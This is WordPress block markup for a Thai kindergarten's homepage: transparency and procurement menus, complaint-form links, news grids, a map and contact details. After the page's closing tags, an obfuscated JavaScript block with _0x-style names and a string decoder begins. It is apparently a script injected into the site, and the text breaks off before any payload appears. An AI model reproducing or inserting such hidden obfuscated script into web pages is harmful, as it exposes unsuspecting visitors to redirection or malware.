href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const 